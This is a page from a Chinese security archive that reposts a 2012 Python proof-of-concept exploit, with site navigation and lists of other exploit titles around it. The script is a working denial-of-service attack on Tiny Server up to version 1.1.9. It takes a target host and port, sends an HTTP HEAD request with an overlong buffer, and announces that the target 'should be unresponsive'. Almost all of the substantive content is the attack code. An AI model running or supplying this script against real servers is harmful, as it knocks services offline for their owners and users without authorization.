首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Tiny Server <= 1.1.9 HTTP HEAD DoS
来源:security.brockhaun@gmail.com 作者:brockhaun 发布时间:2012-03-21  
#!/usr/bin/python
###############################################################################
# Overflow exploiting a vulnerability in Tiny Server <=1.1.9 (HTTP) HEAD request.
# Date of Discovery: 3/19/2012 (0 Day)
# Author: Brock Haun
# Vulnerable Software Download: http://tinyserver.sourceforge.net/tinyserver_full.zip
# Software Version: <=1.1.9
# Target OS: Windows (Tested on Windows 7)
###############################################################################
import httplib,sys
if (len(sys.argv) != 3):
    print '\n\t[*]Usage:  ./' + sys.argv[0] + ' <target host> <port>'
    sys.exit()
host = sys.argv[1]
port = sys.argv[2]
buffer = 'A' * 100 + 'HTTP/1.0\r\n'
print '\n[*]*************************************************'
print '[*] Tiny Server <= 1.1.0(HTTP) HEAD request overflow'
print '[*] Written by Brock Haun'
print '[*] security.brockhaun@gmail.com'
print '[*]*************************************************\n'
try:
    print '\n\t[*] Attempting connection.'
    httpServ = httplib.HTTPConnection(host , port)
    httpServ.connect()
    print '\n\t[*] Connected.'
    print '\n\t[*] Sending crash buffer.'
    httpServ.request('HEAD' , buffer)
    print '\n\t[*] Done! Target should be unresponsive!'
except:
    print '\n\t[***] Connection error. Something went wrong. :('
httpServ.close()
sys.exit()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PeerFTP Server <=v4.01 Remote
·Android FTPServer 1.9.0 Remote
·at32 Reverse Proxy 1.060.310 D
·NetBSD-ftpd 20100320 Remote DD
·znif 2.2.1 (.pls) Local Buffer
·Telnet-Ftp Server <=v1.218 Rem
·VLC v. 2.0.1.0 .voc Memory Cor
·VLC v. 2.0.1.0 .jls DOS
·Internet Explorer (ExeC) Activ
·VLC v. 2.0.1.0 .tta Memory Cor
·Dell Webcam CrazyTalk ActiveX
·2X ApplicationServer 10.1 TuxS
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved